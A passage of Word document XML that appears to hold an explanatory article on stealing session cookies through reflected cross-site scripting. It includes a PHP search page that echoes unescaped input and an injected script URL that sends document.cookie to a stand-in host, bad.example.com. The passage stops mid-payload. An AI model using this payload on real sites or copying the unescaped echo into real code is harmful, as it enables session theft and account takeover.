          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Gaining cookie data through cross-site scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAAF2C4"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One of the most effective ways for an attacker to get a session cookie is to use a cross-site scripting attack. If your website or web application has an XSS vulnerability, the attacker would start by tricking a user into visiting your vulnerable page through a specially crafted URL. The victim is then redirected to a page that executes malicious client-side scripts in the client browser. The malicious JavaScript code accesses the user’s session cookie and sends it to an attacker-controlled server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152FF4BD"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Here is an example of a</w:t>
      </w:r>
      <w:hyperlink r:id="rId11"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 reflected cross-site scripting (XSS)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> vulnerability that could be used to steal a user’s session cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCCBE97"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EE9900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="EE9900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28B88F15"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1990B8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>if</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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="1990B8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>isset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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A67F59"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$_GET</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2F9C0A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'search'</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p>
    <w:p w14:paraId="4B55E594"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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39554D83"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A67F59"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$results</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A67F59"/>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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="2F9C0A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>search_database</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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A67F59"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$_GET</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2F9C0A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'search'</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B5FE7"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1990B8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>echo</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2F9C0A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'Results for "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="2F9C0A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="A67F59"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="A67F59"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>_GET</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2F9C0A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'search'</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A67F59"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="2F9C0A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'":&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="2F9C0A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="2F9C0A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EAD512"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1990B8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>foreach</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A67F59"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$results</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1990B8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>as</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A67F59"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$result</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFCD734"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p>
    <w:p w14:paraId="5AD89A30"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1990B8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w: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r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="A67F59"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$result</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2F9C0A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'result'</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A67F59"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="2F9C0A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="2F9C0A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="2F9C0A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A01B66"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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1347EA7B"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single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FB1CAB"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67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="EE9900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6487977F" w14:textId="77777777" w:rsidR="00C67B4C" w:rsidRPr="00C67B4C" w:rsidRDefault="00C67B4C" w:rsidP="00C67B4C">
      <w:pPr>
        <w:spacing w:after="0"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bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CBD900"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An attacker could inject malicious code into the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> parameter to send the user’s session cookie to a server they control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6750A41F" w14:textId="77777777" w:rsidR="00C67B4C" w:rsidRPr="00C67B4C" w:rsidRDefault="00C67B4C" w:rsidP="00C67B4C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
          <w:right w:val="sing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C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C92C2C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="A67F59"/>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none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>example</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none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="A67F59"/>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none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>search</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none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="A67F59"/>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none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="A67F59"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="A67F59"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>document</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none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="A67F59"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="2F9C0A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'http://bad.example.com/thief.php?data='</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="A67F59"/>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none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>document</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="A67F59"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
